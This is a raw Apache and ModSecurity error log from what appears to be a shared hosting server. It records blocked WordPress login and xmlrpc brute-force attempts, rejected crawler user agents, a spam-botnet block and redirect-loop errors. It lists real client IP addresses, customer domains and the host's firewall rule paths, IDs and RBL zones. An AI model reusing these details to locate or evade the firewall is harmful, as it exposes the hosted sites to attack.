[Tue May 26 18:29:25.157303 2026] [security2:error] [pid 998632:tid 998908] [client 106.222.227.47:29143] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWZLK1OTU2dW0MS1Em98QAAAG8"]
[Tue May 26 18:29:25.751463 2026] [security2:error] [pid 998632:tid 998849] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZLK1OTU2dW0MS1Em94QAAADc"]
[Tue May 26 18:29:28.256168 2026] [security2:error] [pid 998632:tid 998845] [client 124.43.5.103:6309] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZMK1OTU2dW0MS1Em-QAAAADM"]
[Tue May 26 18:29:28.256301 2026] [security2:error] [pid 998632:tid 998845] [client 124.43.5.103:6309] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZMK1OTU2dW0MS1Em-QAAAADM"]
[Tue May 26 18:29:28.524867 2026] [security2:error] [pid 998632:tid 998880] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZLq1OTU2dW0MS1Em-JAAAAFU"]
[Tue May 26 18:29:29.571447 2026] [security2:error] [pid 998632:tid 998740] [remote 217.112.89.35:50906] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWZMa1OTU2dW0MS1Em-VAAAN1Q"]
[Tue May 26 18:29:31.530964 2026] [security2:error] [pid 998632:tid 998702] [remote 217.112.89.35:50906] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWZM61OTU2dW0MS1Em-iQAAJS4"], referer: https://atreegroup.com/wp-login.php
[Tue May 26 18:29:32.200422 2026] [security2:error] [pid 998632:tid 998874] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZMq1OTU2dW0MS1Em-bwAAAE8"]
[Tue May 26 18:29:34.229377 2026] [security2:error] [pid 998632:tid 998898] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZNK1OTU2dW0MS1Em-oQAAAGU"]
[Tue May 26 18:29:34.240194 2026] [security2:error] [pid 998632:tid 998825] [client 209.251.17.223:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWZNq1OTU2dW0MS1Em-_QAAACE"], referer: https://www.anujtradingco.com/
[Tue May 26 18:29:34.638364 2026] [security2:error] [pid 998632:tid 998652] [remote 94.76.235.103:59654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahWZNq1OTU2dW0MS1Em-_wAARgE"]
[Tue May 26 18:29:34.886903 2026] [security2:error] [pid 998632:tid 998911] [client 2a06:98c0:3600::103:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.kexcouriers.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWZNq1OTU2dW0MS1Em_AwAAchc"]
[Tue May 26 18:29:35.475483 2026] [security2:error] [pid 998632:tid 998845] [client 209.251.17.223:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWZN61OTU2dW0MS1Em_GQAAADM"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1224914&moderation-hash=375af826748650f35249fb99402a6c10
[Tue May 26 18:29:36.511614 2026] [security2:error] [pid 998632:tid 998901] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZN61OTU2dW0MS1Em_DAAAAGg"]
[Tue May 26 18:29:38.479820 2026] [security2:error] [pid 998632:tid 998702] [remote 94.76.235.103:59654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahWZOq1OTU2dW0MS1Em_aQAAHi4"], referer: https://yndglobal.com/wp-login.php
[Tue May 26 18:29:39.153547 2026] [security2:error] [pid 998632:tid 998847] [client 124.43.5.103:63417] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZOq1OTU2dW0MS1Em_cwAAADU"]
[Tue May 26 18:29:39.153742 2026] [security2:error] [pid 998632:tid 998847] [client 124.43.5.103:63417] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZOq1OTU2dW0MS1Em_cwAAADU"]
[Tue May 26 18:29:39.161805 2026] [security2:error] [pid 998632:tid 998793] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZOa1OTU2dW0MS1Em_UwAAAAI"]
[Tue May 26 18:29:40.139445 2026] [security2:error] [pid 998632:tid 998912] [client 113.165.20.188:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZOq1OTU2dW0MS1Em_ZQAAAHM"]
[Tue May 26 18:29:41.082981 2026] [security2:error] [pid 998632:tid 998834] [client 185.255.97.50:47817] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "deeigo.com"] [uri "/public/index.php"] [unique_id "ahWZPa1OTU2dW0MS1Em_ogAAACk"], referer: http://deeigo.com/
[Tue May 26 18:29:42.370810 2026] [security2:error] [pid 998632:tid 998845] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZPK1OTU2dW0MS1Em_mgAAADM"]
[Tue May 26 18:29:43.648251 2026] [security2:error] [pid 998632:tid 998762] [remote 222.165.190.235:56932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZP61OTU2dW0MS1Em_4QAAfWg"]
[Tue May 26 18:29:44.107421 2026] [security2:error] [pid 998632:tid 998723] [remote 222.165.190.235:56932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZQK1OTU2dW0MS1Em_7QAAB0M"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:29:45.137364 2026] [security2:error] [pid 998632:tid 998868] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZPq1OTU2dW0MS1Em_0wAAAEo"]
[Tue May 26 18:29:45.243410 2026] [security2:error] [pid 998632:tid 998830] [client 43.173.179.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWZP61OTU2dW0MS1Em_7AAAACY"]
[Tue May 26 18:29:46.803473 2026] [security2:error] [pid 998632:tid 998750] [remote 178.104.164.71:33620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWZQq1OTU2dW0MS1EnAKAAAAV4"]
[Tue May 26 18:29:48.533956 2026] [security2:error] [pid 998632:tid 998836] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZQq1OTU2dW0MS1EnAGwAAACo"]
[Tue May 26 18:29:49.677993 2026] [security2:error] [pid 998632:tid 998881] [client 124.43.5.103:63690] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZRa1OTU2dW0MS1EnAWwAAAFY"]
[Tue May 26 18:29:49.678105 2026] [security2:error] [pid 998632:tid 998881] [client 124.43.5.103:63690] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZRa1OTU2dW0MS1EnAWwAAAFY"]
[Tue May 26 18:29:50.620960 2026] [security2:error] [pid 998632:tid 998901] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZRK1OTU2dW0MS1EnAQAAAAGg"]
[Tue May 26 18:29:50.915382 2026] [security2:error] [pid 998632:tid 998671] [remote 82.223.0.235:43508] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.0.223.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/wp-login.php"] [unique_id "ahWZRq1OTU2dW0MS1EnAaAAAbBI"]
[Tue May 26 18:29:51.253724 2026] [security2:error] [pid 998632:tid 998754] [remote 123.30.233.13:48146] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWZR61OTU2dW0MS1EnAbgAANmE"]
[Tue May 26 18:29:52.456460 2026] [security2:error] [pid 998632:tid 998761] [remote 123.30.233.13:48146] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWZSK1OTU2dW0MS1EnAjQAASmc"], referer: https://bosscoirs.com/wp-login.php
[Tue May 26 18:29:54.251712 2026] [security2:error] [pid 998632:tid 998893] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZR61OTU2dW0MS1EnAhgAAAGA"]
[Tue May 26 18:29:56.801376 2026] [security2:error] [pid 998632:tid 998701] [remote 176.31.139.4:63318] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.huronwoodphysio.com"] [uri "/robots.txt"] [unique_id "ahWZTK1OTU2dW0MS1EnBBQAAUi0"]
[Tue May 26 18:29:56.801590 2026] [security2:error] [pid 998632:tid 998877] [client 176.31.139.4:63318] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.huronwoodphysio.com"] [uri "/robots.txt"] [unique_id "ahWZTK1OTU2dW0MS1EnBBQAAUi0"]
[Tue May 26 18:29:57.092828 2026] [security2:error] [pid 998632:tid 998828] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZSq1OTU2dW0MS1EnAyQAAACQ"]
[Tue May 26 18:29:57.356183 2026] [security2:error] [pid 998632:tid 998672] [remote 136.110.38.51:53720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 51.38.110.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWZTa1OTU2dW0MS1EnBDAAAbBM"]
[Tue May 26 18:29:58.515761 2026] [security2:error] [pid 998632:tid 998771] [remote 142.44.225.193:63584] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.huronwoodphysio.com"] [uri "/"] [unique_id "ahWZTq1OTU2dW0MS1EnBVgAAWHA"]
[Tue May 26 18:29:58.515995 2026] [security2:error] [pid 998632:tid 998884] [client 142.44.225.193:63584] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.huronwoodphysio.com"] [uri "/"] [unique_id "ahWZTq1OTU2dW0MS1EnBVgAAWHA"]
[Tue May 26 18:29:59.408135 2026] [security2:error] [pid 998632:tid 998873] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZTK1OTU2dW0MS1EnBAgAAAE4"]
[Tue May 26 18:30:00.231178 2026] [security2:error] [pid 998632:tid 998829] [client 124.43.5.103:6882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZUK1OTU2dW0MS1EnBgAAAACU"]
[Tue May 26 18:30:00.231324 2026] [security2:error] [pid 998632:tid 998829] [client 124.43.5.103:6882] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZUK1OTU2dW0MS1EnBgAAAACU"]
[Tue May 26 18:30:01.326095 2026] [security2:error] [pid 998632:tid 998889] [client 85.208.96.210:61042] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/11/"] [unique_id "ahWZUa1OTU2dW0MS1EnBowAAAFw"]
[Tue May 26 18:30:01.326255 2026] [security2:error] [pid 998632:tid 998889] [client 85.208.96.210:61042] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/11/"] [unique_id "ahWZUa1OTU2dW0MS1EnBowAAAFw"]
[Tue May 26 18:30:01.815814 2026] [security2:error] [pid 998632:tid 998698] [remote 111.229.141.137:52940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZUa1OTU2dW0MS1EnBrAAABio"]
[Tue May 26 18:30:02.459141 2026] [security2:error] [pid 998632:tid 998791] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZT61OTU2dW0MS1EnBegAAAAA"]
[Tue May 26 18:30:03.907943 2026] [security2:error] [pid 998632:tid 998867] [client 195.178.110.48:60266] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "webdisk.glorodbalsa.com"] [uri "/en"] [unique_id "ahWZU61OTU2dW0MS1EnB9wAAAEk"]
[Tue May 26 18:30:04.061262 2026] [security2:error] [pid 998632:tid 998691] [remote 216.73.216.30:44880] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWZVK1OTU2dW0MS1EnB-gAAbiM"]
[Tue May 26 18:30:04.793713 2026] [security2:error] [pid 998632:tid 998685] [remote 198.38.81.14:50426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 14.81.38.198.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWZVK1OTU2dW0MS1EnCGgAAEh0"]
[Tue May 26 18:30:04.812367 2026] [security2:error] [pid 998632:tid 998887] [client 139.180.225.196:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWZVK1OTU2dW0MS1EnCIAAAAFo"], referer: https://www.anujtradingco.com/
[Tue May 26 18:30:05.355203 2026] [security2:error] [pid 998632:tid 998821] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZUq1OTU2dW0MS1EnBwwAAAB0"]
[Tue May 26 18:30:06.876539 2026] [security2:error] [pid 998632:tid 998661] [remote 103.216.116.57:46324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.116.216.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWZVq1OTU2dW0MS1EnCUQAAMAk"]
[Tue May 26 18:30:06.906651 2026] [security2:error] [pid 998632:tid 998811] [client 17.241.219.230:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWZVq1OTU2dW0MS1EnCVAAAABQ"]
[Tue May 26 18:30:07.573662 2026] [security2:error] [pid 998632:tid 998914] [client 139.180.225.196:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWZV61OTU2dW0MS1EnCbgAAAHU"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 18:30:07.768374 2026] [security2:error] [pid 998632:tid 998834] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZVK1OTU2dW0MS1EnCLAAAACk"]
[Tue May 26 18:30:08.223715 2026] [security2:error] [pid 998632:tid 998868] [client 123.21.25.233:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZVa1OTU2dW0MS1EnCMwAAAEo"]
[Tue May 26 18:30:09.685958 2026] [security2:error] [pid 998632:tid 998766] [remote 103.216.116.57:46324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.116.216.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWZWa1OTU2dW0MS1EnCowAAIGs"], referer: https://shahvishaal.moes-art.com/wp-login.php
[Tue May 26 18:30:10.228966 2026] [security2:error] [pid 998632:tid 998665] [remote 194.163.139.224:40168] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.139.163.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWZWq1OTU2dW0MS1EnCsQAAJQ0"]
[Tue May 26 18:30:10.243305 2026] [core:error] [pid 998632:tid 998903] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:30:10.243324 2026] [core:error] [pid 998632:tid 998903] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:30:10.333724 2026] [security2:error] [pid 998632:tid 998894] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZV61OTU2dW0MS1EnCaQAAAGE"]
[Tue May 26 18:30:11.072470 2026] [security2:error] [pid 998632:tid 998804] [client 124.43.5.103:8021] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZWq1OTU2dW0MS1EnCzAAAAA0"]
[Tue May 26 18:30:11.072596 2026] [security2:error] [pid 998632:tid 998804] [client 124.43.5.103:8021] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZWq1OTU2dW0MS1EnCzAAAAA0"]
[Tue May 26 18:30:12.118485 2026] [core:error] [pid 998632:tid 998853] [client 5.255.120.167:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
